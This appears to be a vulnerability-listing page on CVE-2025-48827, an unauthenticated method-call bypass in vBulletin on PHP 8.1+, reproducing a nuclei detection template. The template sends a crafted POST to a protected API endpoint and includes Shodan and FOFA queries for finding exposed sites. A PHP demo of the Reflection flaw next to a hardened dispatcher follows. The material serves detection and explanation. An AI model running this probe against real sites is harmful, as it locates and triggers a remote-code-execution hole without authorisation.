vBulletin 5.0.0-6.0.3 - Authentication Bypass

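Vulnerability information

Vulnerability name: vBulletin 5.0.0-6.0.3 - Authentication Bypass

Vulnerability ID:

  • CVE: CVE-2025-48827

Vulnerability type: Authorization bypass

Severity: Critical

Vulnerability description: vBulletin is widely used forum software that supports features such as user management, content publishing and community interaction, and is commonly found on corporate and personal websites. Versions 5.0.0 through 5.7.5 and 6.0.0 through 6.0.3 contain an authentication bypass. The root cause is that on PHP 8.1 or later, an internal change to ReflectionMethod::invoke() and similar methods allows protected or private methods to be invoked through PHP's Reflection API by default, so an unauthenticated attacker can remotely call protected API controller methods. As a result, an attacker can execute arbitrary system commands without authentication and take full control of the system as the web server user. Because of its severity and ease of exploitation, it is rated critical. Attackers can use it for remote code execution, leading to data disclosure, service disruption and other serious consequences. To defend against such attacks, users are advised to upgrade to vBulletin 6.0.4 or later and not to use PHP 8.1 or later before upgrading.

Vendor: vbulletin

Product: vbulletin

Affected versions: 5.0.0 <= version <= 5.7.5, 6.0.0 <= version <= 6.0.3

Search syntax: app="vBulletin"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/24af829b88b707025dd10c5acce97e7d577496a6/http%2Fcves%2F2025%2FCVE-2025-48827.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC details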


id: CVE-2025-48827

info:
  name: vBulletin 5.0.0-6.0.3 - Authentication Bypass
  author: pszyszkowski
  severity: critical
  description: |
    vBulletin 5.0.0 through 5.7.5 and 6.0.0 through 6.0.3 contain an authentication bypass caused by unauthenticated access to protected API controllers on PHP 8.1 or later, letting unauthenticated attackers invoke protected methods remotely. Starting from PHP 8.1, due to an internal adjustment to handling of ReflectionMethod::invoke() and similar methods, it now allows — by default — invocation of protected / private methods when using PHP's Reflection API.
  impact: |
    Successful exploitation allows unauthenticated remote attackers to execute arbitrary system commands as the web server user, resulting in full system compromise.
  remediation: |
    Upgrade to vBulletin 6.0.4+ before upgrading to PHP 8.1.
  reference:
    - https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce
    - https://nvd.nist.gov/vuln/detail/CVE-2025-48827
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-48827
    cwe-id: CWE-424
    cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: vbulletin
    product: vbulletin
    fofa-query: app="vBulletin"
    shodan-query: http.component:"vBulletin"
  tags: cve,cve2025,rce,vbulletin,intrusive

variables:
  rand_string: "{{to_lower(rand_base(5))}}"
  rand_value: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /ajax/api/ad/wrapAdTemplate HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        template={{rand_string}}&id_name={{rand_value}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type, 'application/json')
          - contains_all(body,'<div class=','ad_{{rand_value}}_inner','{{rand_string}}')
        condition: and
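
The root cause named in the description, shown as an added example that is not part of the original page and is not vBulletin's code: a dispatcher that relies on Reflection to enforce method visibility, next to one that checks `isPublic()` itself. `Api_Demo`, `dispatchUnsafe` and `dispatchSafe` are hypothetical names, and the explicit check is one way to close the gap, not the vendor's patch.

```php
<?php
// Hypothetical API controller (not vBulletin code): one public method and
// one protected helper that was never meant to be reachable from a request.
class Api_Demo
{
    public function ping(): string
    {
        return 'pong';
    }

    protected function renderInternal(string $tpl): string
    {
        return "rendered:$tpl";
    }
}

// Dispatcher that leaves visibility enforcement to Reflection. On PHP < 8.1
// invoking a protected method throws ReflectionException unless
// setAccessible(true) was called first; on PHP >= 8.1 the call succeeds.
function dispatchUnsafe(object $api, string $method, array $args)
{
    $ref = new ReflectionMethod($api, $method);
    return $ref->invokeArgs($api, $args);
}

// Hardened dispatcher: visibility is checked explicitly, so the outcome
// no longer depends on the PHP version.
function dispatchSafe(object $api, string $method, array $args)
{
    $ref = new ReflectionMethod($api, $method);
    if (!$ref->isPublic()) {
        throw new RuntimeException("method not callable via API: $method");
    }
    return $ref->invokeArgs($api, $args);
}

// Call both methods through both dispatchers and report what happened.
$api = new Api_Demo();
foreach (['ping' => [], 'renderInternal' => ['x']] as $method => $args) {
    foreach (['dispatchUnsafe', 'dispatchSafe'] as $dispatch) {
        try {
            $out = $dispatch($api, $method, $args);
        } catch (Throwable $e) {
            $out = 'blocked (' . get_class($e) . ')';
        }
        printf("PHP %s %-14s %-15s => %s\n", PHP_VERSION, $dispatch, $method, $out);
    }
}
```

Running the same file under PHP 8.0 and under PHP 8.1 or later shows `dispatchUnsafe` changing behaviour for `renderInternal` while `dispatchSafe` blocks it on both.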



http://example.com/2025/07/09/github_1732297384/
Author: lianccc
Published: July 9, 2025